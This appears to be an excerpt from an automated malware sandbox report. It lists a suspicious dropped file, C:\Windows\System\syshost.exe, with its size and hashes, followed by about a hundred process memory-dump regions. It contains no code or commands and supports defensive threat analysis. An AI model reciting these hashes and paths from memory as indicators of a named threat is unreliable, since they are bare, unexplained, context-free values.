SHA512f372c052b8b61ecf7036ef6ec1d067d104ed5cf451c6d08ee2cad39ca57c6b21ce6c109cb3103c0a5631ddc55ea367db1687c0e5ad1e816f5e8b4fa725da99ff
-
C:\Windows\System\syshost.exeFilesize
3.1MB
MD5138eefb81e72bbdf6bf009876f445c28
SHA114afd4156ca94a340e04547809088e6d5d51bc92
SHA25653274ab4f9cebd26058061cd944614586a086d91cd9f36b679e3c8dccae84a7d
SHA512cfd999a6f891f43e0302c013a7e22987c1ca2bdbf7ddb7e9e436703f13ce21acbf431e0acc4aa0be7969c6664306679a0d8243562f26b23bcadc76080a8e6ba5
-
C:\Windows\System\syshost.exeFilesize
3.1MB
MD5138eefb81e72bbdf6bf009876f445c28
SHA114afd4156ca94a340e04547809088e6d5d51bc92
SHA25653274ab4f9cebd26058061cd944614586a086d91cd9f36b679e3c8dccae84a7d
SHA512cfd999a6f891f43e0302c013a7e22987c1ca2bdbf7ddb7e9e436703f13ce21acbf431e0acc4aa0be7969c6664306679a0d8243562f26b23bcadc76080a8e6ba5
-
memory/8-483-0x0000000000150000-0x000000000015F000-memory.dmpFilesize
60KB
-
memory/8-647-0x0000000000150000-0x000000000015F000-memory.dmpFilesize
60KB
-
memory/8-482-0x0000000000310000-0x0000000000319000-memory.dmpFilesize
36KB
-
memory/8-484-0x0000000000310000-0x0000000000319000-memory.dmpFilesize
36KB
-
memory/68-644-0x0000019398410000-0x0000019398420000-memory.dmpFilesize
64KB
-
memory/68-475-0x0000000000190000-0x000000000019B000-memory.dmpFilesize
44KB
-
memory/68-476-0x0000019398410000-0x0000019398420000-memory.dmpFilesize
64KB
-
memory/68-477-0x0000000000190000-0x000000000019B000-memory.dmpFilesize
44KB
-
memory/512-491-0x0000019398410000-0x0000019398420000-memory.dmpFilesize
64KB
-
memory/512-464-0x0000019398410000-0x0000019398420000-memory.dmpFilesize
64KB
-
memory/512-521-0x0000019398410000-0x0000019398420000-memory.dmpFilesize
64KB
-
memory/512-415-0x0000019398410000-0x0000019398420000-memory.dmpFilesize
64KB
-
memory/512-492-0x0000019398410000-0x0000019398420000-memory.dmpFilesize
64KB
-
memory/512-568-0x0000019398410000-0x0000019398420000-memory.dmpFilesize
64KB
-
memory/512-417-0x0000019398410000-0x0000019398420000-memory.dmpFilesize
64KB
-
memory/512-428-0x00000193983C0000-0x00000193983D4000-memory.dmpFilesize
80KB
-
memory/512-471-0x0000019398410000-0x0000019398420000-memory.dmpFilesize
64KB
-
memory/816-295-0x0000000000400000-0x00000000007FD000-memory.dmpFilesize
4.0MB
-
memory/1544-253-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1544-237-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1544-236-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1544-242-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1684-293-0x00007FF666250000-0x00007FF66660D000-memory.dmpFilesize
3.7MB
-
memory/1800-193-0x0000000002B50000-0x0000000002CBF000-memory.dmpFilesize
1.4MB
-
memory/1800-414-0x0000000002CC0000-0x0000000002DEF000-memory.dmpFilesize
1.2MB
-
memory/1800-194-0x0000000002CC0000-0x0000000002DEF000-memory.dmpFilesize
1.2MB
-
memory/1884-250-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1884-278-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1884-233-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1884-356-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1884-283-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1884-239-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1884-247-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1884-281-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1884-231-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1884-285-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/2448-529-0x00000000004C0000-0x00000000004C9000-memory.dmpFilesize
36KB
-
memory/2448-527-0x0000021C7C470000-0x0000021C7C480000-memory.dmpFilesize
64KB
-
memory/2448-649-0x0000021C7C470000-0x0000021C7C480000-memory.dmpFilesize
64KB
-
memory/2548-218-0x0000000000400000-0x00000000007FD000-memory.dmpFilesize
4.0MB
-
memory/2572-595-0x0000000003030000-0x000000000303B000-memory.dmpFilesize
44KB
-
memory/2572-596-0x00000000007C0000-0x00000000007CD000-memory.dmpFilesize
52KB
-
memory/2572-651-0x0000000003030000-0x000000000303B000-memory.dmpFilesize
44KB
-
memory/3004-321-0x00000196D4CD0000-0x00000196D4CE0000-memory.dmpFilesize
64KB
-
memory/3004-240-0x00000196D4CD0000-0x00000196D4CE0000-memory.dmpFilesize
64KB
-
memory/3004-266-0x00000196ED550000-0x00000196ED562000-memory.dmpFilesize
72KB
-
memory/3004-238-0x00000196ED2F0000-0x00000196ED312000-memory.dmpFilesize
136KB
-
memory/3004-241-0x00000196D4CD0000-0x00000196D4CE0000-memory.dmpFilesize
64KB
-
memory/3004-252-0x00000196ED5A0000-0x00000196ED616000-memory.dmpFilesize
472KB
-
memory/3004-371-0x00000196D4CD0000-0x00000196D4CE0000-memory.dmpFilesize
64KB
-
memory/3184-216-0x00000000049D0000-0x00000000049E6000-memory.dmpFilesize
88KB
-
memory/3184-137-0x00000000027F0000-0x0000000002806000-memory.dmpFilesize
88KB
-
memory/3184-289-0x0000000004EC0000-0x0000000004ED6000-memory.dmpFilesize
88KB
-
memory/3184-118-0x0000000000F30000-0x0000000000F46000-memory.dmpFilesize
88KB
-
memory/3232-645-0x0000000000190000-0x000000000019B000-memory.dmpFilesize
44KB
-
memory/3232-481-0x0000000000150000-0x000000000015F000-memory.dmpFilesize
60KB
-
memory/3232-480-0x0000000000190000-0x000000000019B000-memory.dmpFilesize
44KB
-
memory/3232-478-0x0000000000150000-0x000000000015F000-memory.dmpFilesize
60KB
-
memory/3612-119-0x0000000000400000-0x00000000007FD000-memory.dmpFilesize
4.0MB
-
memory/3612-117-0x0000000000A70000-0x0000000000A79000-memory.dmpFilesize
36KB
-
memory/3736-615-0x0000017B34B30000-0x0000017B34B40000-memory.dmpFilesize
64KB
-
memory/3736-620-0x0000017B34B30000-0x0000017B34B40000-memory.dmpFilesize
64KB
-
memory/3812-494-0x0000000002D90000-0x0000000002DB7000-memory.dmpFilesize
156KB
-
memory/3812-489-0x0000000002D90000-0x0000000002DB7000-memory.dmpFilesize
156KB
-
memory/3812-493-0x0000000000B90000-0x0000000000B9C000-memory.dmpFilesize
48KB
-
memory/3856-171-0x00000000025A0000-0x00000000026BB000-memory.dmpFilesize
1.1MB
-
memory/3968-488-0x0000000000B90000-0x0000000000B9C000-memory.dmpFilesize
48KB
-
memory/3968-487-0x0000000000310000-0x0000000000319000-memory.dmpFilesize
36KB
-
memory/3968-485-0x0000000000B90000-0x0000000000B9C000-memory.dmpFilesize
48KB
-
memory/3968-648-0x0000000000310000-0x0000000000319000-memory.dmpFilesize
36KB
-
memory/4012-524-0x0000021C7C470000-0x0000021C7C480000-memory.dmpFilesize
64KB
-
memory/4012-530-0x0000021C7C470000-0x0000021C7C480000-memory.dmpFilesize
64KB
-
memory/4012-522-0x0000021C7C470000-0x0000021C7C480000-memory.dmpFilesize
64KB
-
memory/4128-623-0x0000017B34B30000-0x0000017B34B40000-memory.dmpFilesize
64KB
-
memory/4128-624-0x0000000002F30000-0x0000000002F3B000-memory.dmpFilesize
44KB
-
memory/4208-149-0x00000000000F0000-0x00000000005D0000-memory.dmpFilesize
4.9MB
-
memory/4300-140-0x0000000000400000-0x00000000007FD000-memory.dmpFilesize
4.0MB
-
memory/4300-136-0x0000000000810000-0x0000000000819000-memory.dmpFilesize
36KB
-
memory/4508-319-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4508-335-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4508-350-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4508-342-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4508-304-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4508-307-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4508-334-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4508-341-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4508-338-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4508-355-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4660-165-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4660-209-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4660-180-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4660-173-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4660-168-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4872-288-0x0000000000400000-0x00000000004AC000-memory.dmpFilesize
688KB
-
memory/4872-135-0x00000000020B0000-0x00000000020E6000-memory.dmpFilesize
216KB
-
memory/4872-179-0x0000000000400000-0x00000000004AC000-memory.dmpFilesize
688KB
-
memory/4916-388-0x0000000000C40000-0x0000000000C54000-memory.dmpFilesize
80KB
-
memory/4932-569-0x0000022AFDE70000-0x0000022AFDE80000-memory.dmpFilesize
64KB
-
memory/4932-597-0x0000022AFDE70000-0x0000022AFDE80000-memory.dmpFilesize
64KB
-
memory/4932-570-0x0000022AFDE70000-0x0000022AFDE80000-memory.dmpFilesize
64KB
-
memory/4932-598-0x0000022AFDE70000-0x0000022AFDE80000-memory.dmpFilesize
64KB
-
memory/4940-208-0x00000000002C0000-0x00000000002D2000-memory.dmpFilesize
72KB
-
memory/5024-571-0x0000022AFDE70000-0x0000022AFDE80000-memory.dmpFilesize
64KB
-
memory/5024-572-0x0000000003030000-0x000000000303B000-memory.dmpFilesize
44KB
-
memory/5024-650-0x0000022AFDE70000-0x0000022AFDE80000-memory.dmpFilesize
64KB